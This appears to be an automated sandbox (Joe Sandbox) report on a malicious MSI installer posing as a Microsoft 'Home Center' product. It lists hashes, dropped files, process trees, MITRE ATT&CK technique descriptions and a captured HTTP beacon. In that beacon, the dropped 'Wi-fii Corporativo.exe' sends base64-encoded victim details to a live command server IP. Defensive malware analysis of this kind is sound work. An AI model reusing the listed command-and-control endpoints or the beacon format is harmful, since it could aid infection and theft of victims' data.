	hNgIvHRuTU.dll	Get hash	malicious	Wannacry	Browse	13.229.164.57
	https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ	Get hash	malicious	Unknown	Browse	18.245.46.111

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Installer\MSI28F8.tmp	2tytrCyNuF.msi	Get hash	malicious	Unknown	Browse
	msit.exe	Get hash	malicious	LummaC Stealer	Browse
	msit.msi	Get hash	malicious	LummaC Stealer	Browse
	Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi	Get hash	malicious	Unknown	Browse
	Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi	Get hash	malicious	Unknown	Browse
	bmouJCkvam.msi	Get hash	malicious	Unknown	Browse
	FS-SZHAJCVS.msi	Get hash	malicious	Unknown	Browse
	FS-JFDIBGWE.msi	Get hash	malicious	Unknown	Browse
	http://propdfhub.com	Get hash	malicious	Unknown	Browse
	http://res.pdfonestartlive.com	Get hash	malicious	Unknown	Browse

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	9922
Entropy (8bit):	5.544789337834167
Encrypted:	false
SSDEEP:	96:XrAOBrdhXAZi69qIZNR19UcUHx3bLTCYThqU9UcUHx3bLTCGji8yMnThqNHZfSGj:XrV0iuFOBOEmBO4V0/pB/x
MD5:	A28A7AFBDE66754EB78774FD990BF322
SHA1:	B852C71B7947D753FEAF8ED788ED274ACC7EEFE0
SHA-256:	7037C9C7AD07ED8E629CB9891D1F690C2DB7FD1F26762F3EF8042ABCAFA46D52
SHA-512:	564BB885428D42BBDBBE1798FB0F267DBB0898A358EB29C986CA7260D4CC1BCA3FEC036BA40FE2BDC2CE88EFCB70DDB338664039956E9F29D869CA522FEF8912
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@et/Z.@.....@.....@.....@.....@.....@......&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}..Home Center..fiF8mxzUfw.msi.@.....@.....@.....@........&.{E5EC307B-28AA-4ABE-BD52-84862F31CDBE}.....@.....@.....@.....@.......@.....@.....@.......@......Home Center......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{C2C4E849-6E64-4794-8828-922124BA13B1}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{3E136FF7-1E57-4F46-B6D8-8A1257E82A5E}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{F713780B-33DB-4A09-BFED-2E1AED853CCA}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@......&.{31AB5A48-AD77-44ED-A16F-552ACC228D02}&.{AD07A654-F9E0-4C2E-8281-C407422B8AAE}.@........CreateFolders..Criando novas pastas..Pasta: [1]#.;.C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\.@........InstallFiles..Copiando arquivos novos*.A.r.q.u.i.v.o.:. .[.1.].,. .D.i.r.e.t...r.i.

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.161178035657574
Encrypted:	false
SSDEEP:	192:vovz05J0o89Pj4sZr3yODggzuiFOZ24IO8y:s05qo89PjkgzuiFOY4IO8y
MD5:	7D671D7C05334B117A4CA9C5C8FDDD26
SHA1:	A72245B9315C367DC640AC25B81C8A17892F0B58
SHA-256:	B38700EFA96430F6491FBD7A782E99151E5BA355F086D192DB64160B86C6654B
SHA-512:	61C9DD636B78E825743BFBAAC90D100CFE2C4D80F975B81E396A96DC8745F4FF17C81A88CABAFBB88841490B07BA3AE4C17BA82716F1B5BD85AD1DBDC7AE4236
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.8.4.8.4.2.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.4.3.4.6.8.8.5.9.2.8.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.6.8.f.9.a.5.-.0.d.0.8.-.4.3.6.1.-.9.5.1.a.-.6.b.6.f.3.a.8.6.7.a.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.e.4.3.d.2.9.-.7.8.a.b.-.4.2.8.a.-.9.0.1.7.-.7.b.5.f.9.f.a.4.c.b.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.4.-.0.0.0.1.-.0.0.1.4.-.b.d.7.d.-.0.a.b.6.8.4.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.9.e.5.6.7.d.f.6.b.2.9.0.8.2.e.1.6.8.d.f.0.0.7.6.9.7.e.0.9.9.f.0.0.0.0.f.f.f.f.!.0.0.0.0.f.d.d.f.c.d.3.e.7.0.e.8.e.2.6.d.3.c.4.f.2.5.b.d.5.f.d.0.e.0.e.c.4.1.e.6.1.d.9.d.!.W.i.-.f.i.i. .C.o.r.p.o.r.a.t.i.v.

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E5EC307B-28AA-4ABE-BD52-84862F31CDBE}, Number of Words: 10, Subject: Home Center, Author: @MicrosoftHome, Name of Creating Application: Home Center, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Home Center., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Jan 6 17:55:54 2025, Last Saved Time/Date: Mon Jan 6 17:55:54 2025, Last Printed: Mon Jan 6 17:55:54 2025, Number of Pages: 450
Entropy (8bit):	7.9720569313982494
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	fiF8mxzUfw.msi
File size:	23'667'712 bytes
MD5:	878933ddb3c232ad3d24df9248d143ad
SHA1:	ad166a8895b669a267f8dd05a86f373c29a2cc05
SHA256:	e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05
SHA512:	9bef0a6c8d46118ed7589f97de5a49f03a17dbb0408e7c5da38b462a885e60a8d8737fc09cbbdf08adc5c5ed72c141560f9e99401051b723d1f0a819ad456713
SSDEEP:	393216:nkiS2W8FlnP/iiJoNAg/n+HwFdzFUZA5pfSCManDT2w4rzsJ/ADt1fpsybiY05UY:nA2WG/iiJoNAgGHi15UYDafrzS/E65R
TLSH:	A03733267687C139F56E45B7E929FE5E413D7E63073001E3B2F5399A89B08C1A27DB02
File Content Preview:	........................>...................j...................................F.......c.......o..............................................................................................................................................................

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 20:35:21.434344053 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:21.439291954 CET	80	49711	15.228.77.178	192.168.2.5
Jan 15, 2025 20:35:21.439433098 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:21.439548016 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:21.444284916 CET	80	49711	15.228.77.178	192.168.2.5
Jan 15, 2025 20:35:21.444351912 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:21.681444883 CET	80	49711	15.228.77.178	192.168.2.5
Jan 15, 2025 20:35:42.812726021 CET	80	49711	15.228.77.178	192.168.2.5
Jan 15, 2025 20:35:42.812877893 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:42.813045025 CET	49711	80	192.168.2.5	15.228.77.178
Jan 15, 2025 20:35:42.817806959 CET	80	49711	15.228.77.178	192.168.2.5
Jan 15, 2025 20:35:49.850397110 CET	59922	53	192.168.2.5	162.159.36.2
Jan 15, 2025 20:35:49.855226040 CET	53	59922	162.159.36.2	192.168.2.5
Jan 15, 2025 20:35:49.856039047 CET	59922	53	192.168.2.5	162.159.36.2
Jan 15, 2025 20:35:49.860868931 CET	53	59922	162.159.36.2	192.168.2.5
Jan 15, 2025 20:35:50.323038101 CET	59922	53	192.168.2.5	162.159.36.2
Jan 15, 2025 20:35:50.328133106 CET	53	59922	162.159.36.2	192.168.2.5
Jan 15, 2025 20:35:50.328196049 CET	59922	53	192.168.2.5	162.159.36.2

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 20:35:49.849761963 CET	53	54268	162.159.36.2	192.168.2.5
Jan 15, 2025 20:35:50.341856003 CET	53	50851	1.1.1.1	192.168.2.5

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 20:35:21.439548016 CET	271	OUT	POST /ytr/serv.php HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 142 Host: 15.228.77.178 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Jan 15, 2025 20:35:21.444351912 CET	142	OUT	Data Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 59 57 78 6d 62 32 35 7a 26 63 6e 61 6d 65 3d 4d 6a 45 77 4f 54 63 35 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48 4a 76 49 Data Ascii: vv=10&vw=&mods=&uname=YWxmb25z&cname=MjEwOTc5&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iav=V2luZG93cyBEZWZlbmRlcg

Target ID:	0
Start time:	14:35:06
Start date:	15/01/2025
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi"
Imagebase:	0x7ff70d7e0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	14:35:07
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673
Imagebase:	0x4b0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	14:35:10
Start date:	15/01/2025
Path:	C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Imagebase:	0x510000
File size:	19'128 bytes
MD5 hash:	8AAF6B0EF4409498EAA1F506819285CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Target ID:	7
Start time:	14:35:53
Start date:	15/01/2025
Path:	C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Imagebase:	0x510000
File size:	19'128 bytes
MD5 hash:	8AAF6B0EF4409498EAA1F506819285CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	8
Start time:	14:36:02
Start date:	15/01/2025
Path:	C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
Imagebase:	0x510000
File size:	19'128 bytes
MD5 hash:	8AAF6B0EF4409498EAA1F506819285CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	10
Start time:	14:36:09
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
Imagebase:	0x210000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	14:37:48
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
Imagebase:	0x210000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	16
Start time:	14:37:50
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
Imagebase:	0x210000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.6%
Total number of Nodes:	95
Total number of Limit Nodes:	3

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fiF8mxzUfw.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\6f262b.rbs

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_4568f9a5-0d08-4361-951a-6b6f3a867a64\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_5ef81f74-43b2-4a4c-9f72-dafcda16006e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_9f6d106525ddff3047cc3d7f91c964574f62d181_d6cb0167_6af63582-62ce-464a-9268-d16983bb961d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_9f6d106525ddff3047cc3d7f91c964574f62d181_d6cb0167_f22a0b73-abbb-42e9-99ee-cc71b024266b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BB5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D4C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D8B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2970.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A9A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2ACA.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EF9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FA6.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FF5.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA85F.tmp.dmp

Windows Analysis Report
fiF8mxzUfw.msi

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre